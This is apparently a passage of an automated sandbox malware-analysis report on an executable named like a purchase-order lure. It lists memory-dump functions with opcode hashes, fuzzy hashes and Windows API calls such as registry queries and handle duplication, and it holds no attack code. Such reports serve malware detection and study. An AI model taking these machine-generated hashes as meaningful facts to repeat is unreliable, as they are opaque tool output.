                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ed129ccdc3bb6dca6d37a009e5d7a2a3fdd0147bcc943e2fef134b303d5fd878
                                                                      • Instruction ID: 95bfe036e8aa5c9553722444f263e5e26ed02e4da74ac40f9d4d848c353e6707
                                                                      • Opcode Fuzzy Hash: ed129ccdc3bb6dca6d37a009e5d7a2a3fdd0147bcc943e2fef134b303d5fd878
                                                                      • Instruction Fuzzy Hash: 5641E6B0E1520ACFDB44DFAAC5815AEFBF2FF89300F24C56AC515B7294E7309A418B95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07083340, Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 276e3caba3dcf53a7d33061ae57d142aa48419da174d0ed0d5ad5086fede866d
                                                                      • Instruction ID: f581972152d57e5b222b9621d997a1d31921c3fcdd526a413aa172054c19a2b7
                                                                      • Opcode Fuzzy Hash: 276e3caba3dcf53a7d33061ae57d142aa48419da174d0ed0d5ad5086fede866d
                                                                      • Instruction Fuzzy Hash: 4121EAB1E14618DBEB48CFABD8406DEFAF7BFC8200F04D17AD818A6264EB3405458F55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07083330, Relevance: .1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a12b903b26791b3bd8d1976a0d8a2225dcf8f79a743263c10cfb1780ba231af8
                                                                      • Instruction ID: 9d41ebb3d0271fc2a27fab61fee344cebe18016986834604a7f8636b74f0bb17
                                                                      • Opcode Fuzzy Hash: a12b903b26791b3bd8d1976a0d8a2225dcf8f79a743263c10cfb1780ba231af8
                                                                      • Instruction Fuzzy Hash: 6021B8B1E146199BEB48CFABC84069EFBF3BFC9600F08D17AD818A6258EB3415458F55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07088C08, Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c919f7be3b75aa27fce34f9e5086906e8c0fdfa98ea54971c24dba37c53858e8
                                                                      • Instruction ID: 4e89bf9a67b044e7c5a24a80b50b8976bb3d0052acc0fe996439058f346da492
                                                                      • Opcode Fuzzy Hash: c919f7be3b75aa27fce34f9e5086906e8c0fdfa98ea54971c24dba37c53858e8
                                                                      • Instruction Fuzzy Hash: 5A21ACB1E116188BEB58DFABD84069EFBF7AFC8300F04C47AD909A6254EB3459858F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0708F118, Relevance: .1, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8d13cb84975252dcdfbc1b61359a3f7e5af7e09c59a8a454a1480b8faa65bac7
                                                                      • Instruction ID: e056af29dda3bb48e8fcca79cf7b7df21fd8be921d9d087992f8361a5e51da99
                                                                      • Opcode Fuzzy Hash: 8d13cb84975252dcdfbc1b61359a3f7e5af7e09c59a8a454a1480b8faa65bac7
                                                                      • Instruction Fuzzy Hash: E22134B1E112199BDB48CFAAD9416EEFBF7FFC9210F14C23AD418B6254DB345A018B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0708C5B0, Relevance: .1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ef4a20600c63f350f94bb0f5bda0fcd56e14b10ed12c25945d982e7f829056ac
                                                                      • Instruction ID: 15e686807cd1f9120a37c6da85d54646041d58a896a29d8e261caf1051524098
                                                                      • Opcode Fuzzy Hash: ef4a20600c63f350f94bb0f5bda0fcd56e14b10ed12c25945d982e7f829056ac
                                                                      • Instruction Fuzzy Hash: E22127B1E106199BEB48CFABD9406EEFBF7ABC8250F14C17AD408A7214DB345A458B61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe PID: 4792 Parent PID: 4252 new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCOMMON

                                                                      Executed Functions

                                                                      Function 0112DFD8, Relevance: 2.3, APIs: 1, Instructions: 760libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.520883466.0000000001120000.00000040.00000010.sdmp, Offset: 01120000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3f1ad400e126cf9a08ea027334e68a8a6ab0056b873eee0c53c281d0891ba5c1
                                                                      • Instruction ID: 45fa7ae49565b28a2d6a574a96b6af503c3400de45f66531f811b7a4c7319683
                                                                      • Opcode Fuzzy Hash: 3f1ad400e126cf9a08ea027334e68a8a6ab0056b873eee0c53c281d0891ba5c1
                                                                      • Instruction Fuzzy Hash: E0621B30E007298FDB24EF78C85869DB7F5AF89304F1189A9D54AAB254EF309D85CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013E6BA3, Relevance: 6.1, APIs: 4, Instructions: 123threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 013E6C10
                                                                      • GetCurrentThread.KERNEL32 ref: 013E6C4D
                                                                      • GetCurrentProcess.KERNEL32 ref: 013E6C8A
                                                                      • GetCurrentThreadId.KERNEL32 ref: 013E6CE3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: d04db681a7be2c5197995ddecd7ff65751122b718f6d5ef6c87ed25b5dbb1919
                                                                      • Instruction ID: 24c47a67dae7d3ac61787cea41e47a88ba9c7259c9ff037f6aaa931465aa02c8
                                                                      • Opcode Fuzzy Hash: d04db681a7be2c5197995ddecd7ff65751122b718f6d5ef6c87ed25b5dbb1919
                                                                      • Instruction Fuzzy Hash: 245132B09007488FDB14CFA9D549BDEBBF0EFA8318F248869E409A3390D774A844CF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013E6BB0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 013E6C10
                                                                      • GetCurrentThread.KERNEL32 ref: 013E6C4D
                                                                      • GetCurrentProcess.KERNEL32 ref: 013E6C8A
                                                                      • GetCurrentThreadId.KERNEL32 ref: 013E6CE3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: f216c8921c495cfa8b18d3a76a856693067a4054006ca31683b35688a4d29ba5
                                                                      • Instruction ID: a756860ef6d5f8eba5866bd8a6f2e320347f2869deb290a52dab02199fec054b
                                                                      • Opcode Fuzzy Hash: f216c8921c495cfa8b18d3a76a856693067a4054006ca31683b35688a4d29ba5
                                                                      • Instruction Fuzzy Hash: D05132B09007488FDB14CFA9D549BDEBBF4EFA8318F208859E409A3390D774A944CF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0112BAA8, Relevance: 2.5, APIs: 1, Instructions: 1019COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.520883466.0000000001120000.00000040.00000010.sdmp, Offset: 01120000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 79aa1533c665b4bf23b98b46c05be7575c09321422416c5445f9970d11805ddd
                                                                      • Instruction ID: 8a727472a8b9d4d98fa672cafb3c4b801beaa5189cc61e49b52ebf039094a04a
                                                                      • Opcode Fuzzy Hash: 79aa1533c665b4bf23b98b46c05be7575c09321422416c5445f9970d11805ddd
                                                                      • Instruction Fuzzy Hash: 3C925830A00214CFDB28DBA8D488BADBBF2EF85314F158969E51ADB351DB35DC85CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011EB718, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.520981828.00000000011E0000.00000040.00000010.sdmp, Offset: 011E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 02c2eab002f4073356f83bacb9010a18b711c799a0d1602e268f58a60a5f4c1a
                                                                      • Instruction ID: 2c80dfbbb9ac73a203b2c141443d355a02208ce2e3eec76a9dc06a099748c2e2
                                                                      • Opcode Fuzzy Hash: 02c2eab002f4073356f83bacb9010a18b711c799a0d1602e268f58a60a5f4c1a
                                                                      • Instruction Fuzzy Hash: FF614E30A04705DBDB18DBF8D59CBAEBBF6AF84314F108828E502A7394EB749845CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013E516F, Relevance: 1.7, APIs: 1, Instructions: 160COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013E5302
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: ff579c5fb68d18deb5e79127a2a83abbcd2cf9fe5446c7d99faf6f5bb24cd80f
                                                                      • Instruction ID: 07a00a289425953f5d8ff7ce45fcf87999ddd6b73cbffdabf1e846fdec8bc18b
                                                                      • Opcode Fuzzy Hash: ff579c5fb68d18deb5e79127a2a83abbcd2cf9fe5446c7d99faf6f5bb24cd80f
                                                                      • Instruction Fuzzy Hash: 9F6102B5C043499FDF02CFA9C884ADDBFB1BF49308F29819AE918AB261D3759855CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0112C6E0, Relevance: 1.6, APIs: 1, Instructions: 138libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.520883466.0000000001120000.00000040.00000010.sdmp, Offset: 01120000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: fa60e4f724314d451e90316b9fe9db4072502476bf4a6741fe1b7598a4daf3ae
                                                                      • Instruction ID: ed7b73f35aee40716d6f4cabb2392f9a639927ec679aa7b9c30e274550270b7f
                                                                      • Opcode Fuzzy Hash: fa60e4f724314d451e90316b9fe9db4072502476bf4a6741fe1b7598a4daf3ae
                                                                      • Instruction Fuzzy Hash: 2F417331A003059FCB14EFB4D848AAEB7F6BF84314F148969E506DB395EF70A804CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013E51F0, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013E5302
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 4d4ecf640a503fe0c61f035e56facbebdbde3256e93e65b0222c98e04835580a
                                                                      • Instruction ID: dc0ec3b7be0ad3724759b7c549f2358100ee12687c69e5c610bdcf4c78bcc24e
                                                                      • Opcode Fuzzy Hash: 4d4ecf640a503fe0c61f035e56facbebdbde3256e93e65b0222c98e04835580a
                                                                      • Instruction Fuzzy Hash: F741CEB5D003189FDF14CFA9C884ADEBBF5BF48314F24852AE819AB250D7B4A845CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011E91F8, Relevance: 1.6, APIs: 1, Instructions: 112registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 011E930C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.520981828.00000000011E0000.00000040.00000010.sdmp, Offset: 011E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: d9d28010650e6e00032d6ef868ae425005fd64175723bb7c851b1f2dfe14eb4b
                                                                      • Instruction ID: e4ec6d316d98caea67990e3db3e95ae2097fd8916a50e47fb93c600dcc83d20c
                                                                      • Opcode Fuzzy Hash: d9d28010650e6e00032d6ef868ae425005fd64175723bb7c851b1f2dfe14eb4b
                                                                      • Instruction Fuzzy Hash: 004154B0E043498FDB14CFA8C548A8EBFF5AF49308F28C5AAD409AB345D7749849CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013E69C4, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 013E7D61
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CallProcWindow
                                                                      • String ID:
                                                                      • API String ID: 2714655100-0
                                                                      • Opcode ID: 12ecbdcff3bc9a8867a7157b8f1e73741d2b803a6ec746ffa2a14ecd61d4dc45
                                                                      • Instruction ID: f21588f801ecd44d622e8996de876cfcb03b6425594a879567bc41c20701d636
                                                                      • Opcode Fuzzy Hash: 12ecbdcff3bc9a8867a7157b8f1e73741d2b803a6ec746ffa2a14ecd61d4dc45
                                                                      • Instruction Fuzzy Hash: 35415BB5A00719CFCB14CF99C448AABBBF5FF88318F248859E419A7351D735A845CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011E94B5, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 011E9579
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.520981828.00000000011E0000.00000040.00000010.sdmp, Offset: 011E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 6fd44f5a2024e86c05e6aa5cc697006e96a28a517c938496f686dc07e24d0c32
                                                                      • Instruction ID: 4efda1d02a108f820508d4a5d9802101d03fcbe1738387d5dd1a43540125ce78
                                                                      • Opcode Fuzzy Hash: 6fd44f5a2024e86c05e6aa5cc697006e96a28a517c938496f686dc07e24d0c32
                                                                      • Instruction Fuzzy Hash: 4C4112B1D006589FCB14CFEAC988ADEBFF5BF48314F55806AE819AB210D7749905CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011E8B80, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 011E9579
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.520981828.00000000011E0000.00000040.00000010.sdmp, Offset: 011E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: efe3a88465d347f1c0d2c50138cb1c2946443b09c76b991e640fb53170ffaf7f
                                                                      • Instruction ID: 4c3e86e20951f8c65135d9ec363fd58ca585b3a11477b8f1e495a43072f2de6d
                                                                      • Opcode Fuzzy Hash: efe3a88465d347f1c0d2c50138cb1c2946443b09c76b991e640fb53170ffaf7f
                                                                      • Instruction Fuzzy Hash: DE31EEB1D006689FCB14CFDAC988ADEBFF5BF48314F55842AE819AB210D7749905CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011E8B74, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 011E930C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.520981828.00000000011E0000.00000040.00000010.sdmp, Offset: 011E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 747d73ea2331d535236399cbcd321569e757f9b2adeb73721552b64ba1d546e2
                                                                      • Instruction ID: c7d9987b4ea672a4b9a73118ac2a0b26b160cfe2ed2c234963e6868ad49dbff9
                                                                      • Opcode Fuzzy Hash: 747d73ea2331d535236399cbcd321569e757f9b2adeb73721552b64ba1d546e2
                                                                      • Instruction Fuzzy Hash: 4631E3B0D046498FDB14CFD9C588ACEFBF5AF48304F28856AE809AB341C7759945CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013EC399, Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 013EC422
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EncodePointer
                                                                      • String ID:
                                                                      • API String ID: 2118026453-0
                                                                      • Opcode ID: 2b690d2cfba6a64323b3e075489d49eaf94db486acbb0bdb127157e28ac911cf
                                                                      • Instruction ID: a83b353b63a31da34924b863906461dc77ef68c7fbe8555476bf0d8e882329c6
                                                                      • Opcode Fuzzy Hash: 2b690d2cfba6a64323b3e075489d49eaf94db486acbb0bdb127157e28ac911cf
                                                                      • Instruction Fuzzy Hash: 4131E0B58047958FDB11DFA9E40979EBFF4EF05308F148969E448B3282C779A508CF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013E6DD3, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013E6E5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 5cc6e52d21b71057ff93482ae80f05c7b092c4b69b7cb04bb1328127812b7857
                                                                      • Instruction ID: aa4f7c74bbe38200a9359fd94761bf668e43bdaa00e661c83bf38b3d35b5b6bc
                                                                      • Opcode Fuzzy Hash: 5cc6e52d21b71057ff93482ae80f05c7b092c4b69b7cb04bb1328127812b7857
                                                                      • Instruction Fuzzy Hash: 9121C4B5900318AFDF10CFA9D984ADEBBF8EB58324F14841AE918A7350D374A954CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013E6DD8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013E6E5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 402ae7e374ac3655360e172b5eafff1ec4c51aa4c84d8d35e6a5ca71d851766d
                                                                      • Instruction ID: 5d7d2c60e191ff7ebd6b4489e675a24540f0f2ed2f76ad403693bc5ebdbb495b
                                                                      • Opcode Fuzzy Hash: 402ae7e374ac3655360e172b5eafff1ec4c51aa4c84d8d35e6a5ca71d851766d
                                                                      • Instruction Fuzzy Hash: 2421C4B59003189FDF10CFA9D584ADEBBF8EB58324F14841AE918A7350D374A954CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011EB70E, Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.520981828.00000000011E0000.00000040.00000010.sdmp, Offset: 011E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 6e52edd215cf7b09010c021353c1c3e7ff074408211c7fdfd50881edd3c773e8
                                                                      • Instruction ID: 583750e33a3d7f58c0952284d7078c8f4ecafc9ce5ad13ebbb55ad452387d37c
                                                                      • Opcode Fuzzy Hash: 6e52edd215cf7b09010c021353c1c3e7ff074408211c7fdfd50881edd3c773e8
                                                                      • Instruction Fuzzy Hash: 2B219A70909648DFCB19EFB8D4A8A9DBBF2FF88314F158468D401AB391EB319885CF55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013EC3A8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 013EC422
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EncodePointer
                                                                      • String ID:
                                                                      • API String ID: 2118026453-0
                                                                      • Opcode ID: 7241464e90e9006d10bdc73d45f3f3d1a74fa291fb563cb990c34153e232af0b
                                                                      • Instruction ID: 8d3539fad3774a751a7cfc7c431108825cdbd59f1a98bc356b66e3998c3aabd3
                                                                      • Opcode Fuzzy Hash: 7241464e90e9006d10bdc73d45f3f3d1a74fa291fb563cb990c34153e232af0b
                                                                      • Instruction Fuzzy Hash: 21114AB19007558FDB10DFA9D50979EBBF4EB44718F248929E409B3641D778A604CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0137D53C, Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.521729563.000000000137D000.00000040.00000001.sdmp, Offset: 0137D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 338734f8d302180425d95089a909f6bec17f456e6046dd2306fc8ef14e73bc7c
                                                                      • Instruction ID: e682af4d7124c55863d0ad6b656ca44c9c99db00173b18fbed9aede8c639136b
                                                                      • Opcode Fuzzy Hash: 338734f8d302180425d95089a909f6bec17f456e6046dd2306fc8ef14e73bc7c
                                                                      • Instruction Fuzzy Hash: 00210371500244DFDB21DF94D9C0F6ABF6AFF8432CF248969E8094B246C33AD45ACBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0137D450, Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.521729563.000000000137D000.00000040.00000001.sdmp, Offset: 0137D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b69c55c0103e3f0194d56463a8785c1bfd4348e56e195bde2589287191739a80
                                                                      • Instruction ID: 9313e8a47a6c63be1c254a35958276509ff3d6e55b3a0d3148a2bfbd34e69eb4
                                                                      • Opcode Fuzzy Hash: b69c55c0103e3f0194d56463a8785c1bfd4348e56e195bde2589287191739a80
                                                                      • Instruction Fuzzy Hash: 6421F471504244DFDB21DF94D9C0B67BB69FF84328F248569E8051A606C73AE459C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0138D01C, Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.521803376.000000000138D000.00000040.00000001.sdmp, Offset: 0138D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b17b740070dbd69414999051744b75368385f4f35708a074c96fd077944405a2
                                                                      • Instruction ID: 07ce1af198a0cc45f6d91a04cb54edca76586012748d2c9945c1f85a5103b89d
                                                                      • Opcode Fuzzy Hash: b17b740070dbd69414999051744b75368385f4f35708a074c96fd077944405a2
                                                                      • Instruction Fuzzy Hash: B32100B1604344DFDB15EF94D8C4B16BB69FB84268F20C969E84A4B686C336D84BCB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0137D537, Relevance: .1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.521729563.000000000137D000.00000040.00000001.sdmp, Offset: 0137D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b220346838b617afc249cfd39a22b485ab4c3c01a0c1e966dd926474b5198b28
                                                                      • Instruction ID: 16f8cea33ec56556be2373b4caaaa9c4bfe6f971f1efc5e065715435f3c5c7d0
                                                                      • Opcode Fuzzy Hash: b220346838b617afc249cfd39a22b485ab4c3c01a0c1e966dd926474b5198b28
                                                                      • Instruction Fuzzy Hash: 2F11B176504280CFCB12CF54D5C4B16BF72FF84328F2486A9D8494B656C33AD45ACBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0137D44B, Relevance: .1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.521729563.000000000137D000.00000040.00000001.sdmp, Offset: 0137D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b220346838b617afc249cfd39a22b485ab4c3c01a0c1e966dd926474b5198b28
                                                                      • Instruction ID: f3afd0f95ff0bcf7fceeea87f8257d57d87fa1964886b9a5d9671910031865c7
                                                                      • Opcode Fuzzy Hash: b220346838b617afc249cfd39a22b485ab4c3c01a0c1e966dd926474b5198b28
                                                                      • Instruction Fuzzy Hash: DF11BE76504280DFDB12CF54D9C4B16BF72FF84328F2886A9D8054B657C33AE45ACBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0138D017, Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.521803376.000000000138D000.00000040.00000001.sdmp, Offset: 0138D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 97667016c062c97266623d2c50188c71d14a0f74471c64901586c743aa3c0651
                                                                      • Instruction ID: 99f43612f957a9300b0ae5909673d6567bb13401956276ec11afc91dc338d24e
                                                                      • Opcode Fuzzy Hash: 97667016c062c97266623d2c50188c71d14a0f74471c64901586c743aa3c0651
                                                                      • Instruction Fuzzy Hash: 6411BEB5504380CFDB12DF54D5C4B16BB61FB84318F24C6A9D8494B696C33AD45BCB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions